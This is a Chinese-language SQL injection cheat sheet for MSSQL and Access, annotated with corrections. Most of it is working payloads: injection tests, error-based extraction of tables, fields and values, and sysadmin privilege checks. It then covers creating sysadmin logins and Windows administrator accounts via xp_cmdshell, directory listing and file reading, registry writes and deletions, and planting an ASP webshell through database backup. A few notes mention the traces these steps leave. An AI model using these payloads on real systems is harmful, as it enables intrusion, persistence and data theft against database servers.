1.判断是否有注入：;and 1=1 / ;and 1=2（两者返回页面有差异则可能存在注入；适用于数字型参数）

2.初步判断是否是 mssql：;and user>0（mssql 中 user 是返回当前用户名的字符串型内置函数，与整数比较会触发类型转换错误；前提是应用把数据库报错回显出来，后面多数"爆"数据的语句都依赖这一点）

3.注入参数是字符型：'and [查询条件] and ''='

4.搜索时没过滤参数的：'and [查询条件] and '%25'='（%25 是 URL 编码后的 %，用来闭合 LIKE '%...%' 子句）
5.判断数据库系统

;and (select count(*) from sysobjects)>0   mssql（sysobjects 是 mssql 的系统表）

;and (select count(*) from msysobjects)>0   access（msysobjects 是 access 的系统表）

（两条语句各自只在对应的数据库上能正常执行，根据哪一条返回正常页面即可区分。）
6.猜表名：;and (select Count(*) from [表名])>0（原文写作"数据库名"，但这里 from 后面填的实际是表名）

7.猜字段名：;and (select Count(字段名) from 表名)>0

8.猜字段中记录长度：;and (select top 1 len(字段名) from 表名)>0（把 >0 逐步换成 >N 来逼近长度；没有 ORDER BY 时 top 1 取到的是哪一行并不确定）
9.(1)猜字段的 ascii 值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0

(2)猜字段的 ascii 值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0

（逐位修改 mid/substring 的起始位置并对比较值做二分，即可逐字符还原该字段内容。）
10.测试权限结构（mssql）

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--

（IS_SRVROLEMEMBER 检查的是服务器级固定角色，IS_MEMBER('db_owner') 检查的是当前数据库的角色；返回 1 表示是成员，0 表示不是，NULL 表示角色名无效。下面第 11～14 节的操作基本都要求 sysadmin，先在这里确认权限再往下做。）
11.添加 mssql 和系统的帐户（需要 sysadmin 权限）

;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,password,username;--   （sp_password 的参数顺序是：旧密码, 新密码, 登录名；原文把后两个写反了）

;exec master.dbo.sp_addsrvrolemember username,sysadmin;--   （sp_addsrvrolemember 的参数顺序是：登录名, 角色名；原文写反了）

;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--   （各开关之间要有空格，原文缺空格）

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

（注意：xp_cmdshell 在 SQL Server 2005 及之后的版本默认关闭；它以 SQL Server 服务帐户的身份执行命令，能否成功添加系统帐户取决于该服务帐户的操作系统权限。sp_addlogin/sp_password 是旧接口，新版本中已由 CREATE LOGIN / ALTER LOGIN 取代。这些操作都会在目标上留下新登录名、角色变更和系统帐户等明显痕迹。）
12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0

（原文最后一行误写为 ">)"，应为 ">0"。xp_dirtree 返回 (subdirectory, depth) 两列，正好对应 dirs(paths, id)；varchar 与整数比较会触发转换错误，目录名从报错信息里读出。每次把已得到的目录名追加进 not in(...) 列表即可逐个取出。创建的 dirs 表会留在目标库中，也是排查时值得关注的痕迹。）
(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;--   获得当前所有驱动器（结果集为 4 列，对应 temp 的 4 列）

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--   获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   查看文件的内容

（之后用与 12(1) 相同的方法从 temp 表逐行读取结果；xp_cmdshell 同样受第 11 节所述"默认关闭"的限制。）
13.mssql 中的注册表存储过程

xp_regenumvalues 根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   以多个记录集方式返回所有键值

xp_regread 根键, 子键, 键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   返回指定键的值

xp_regwrite 根键, 子键, 值名, 值类型, 值

值类型有 2 种：REG_SZ 表示字符串，REG_DWORD 表示整数

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'   写入注册表

xp_regdeletevalue 根键, 子键, 值名

;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   删除某个值

;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   删除键，包括该键下所有值

（这些都是 master 库中的扩展存储过程，写入/删除会以 SQL Server 服务帐户的权限直接改动目标主机的注册表，属于持久化改动，通常需要 sysadmin 权限。）
14.mssql 的 backup 创建 webshell

use model

create table cmd(str image);

insert into cmd(str) values ('');   -- 引号内是要写入文件的内容（原文此处为空）

backup database model to disk='c:\l.asp';

（说明：备份文件除插入的内容外还带有大量二进制数据，目标路径必须位于 web 目录且 SQL Server 服务帐户对其可写。model 库是新建数据库的模板，留在其中的 cmd 表会被复制进之后新建的每个数据库，是非常明显的入侵痕迹。）
15.mssql 内置函数

;and (select @@version)>0   获得版本信息（@@version 返回的是 SQL Server 版本字符串，其中包含 Windows 版本；同样依赖类型转换报错回显）

;and user_name()='dbo'   判断当前用户在当前库中是否映射为 dbo（sa 以及 sysadmin 成员都会映射为 dbo，所以这只能说明权限很高，不能断定就是 sa）

;and (select user_name())>0   爆当前系统的连接用户

;and (select db_name())>0   得到当前连接的数据库
16.简洁的 webshell（与第 14 节相同，只是备份路径不同）

use model

create table cmd(str image);

insert into cmd(str) values ('');   -- 引号内是要写入文件的内容（原文此处为空）

backup database model to disk='g:\wwwtest\l.asp';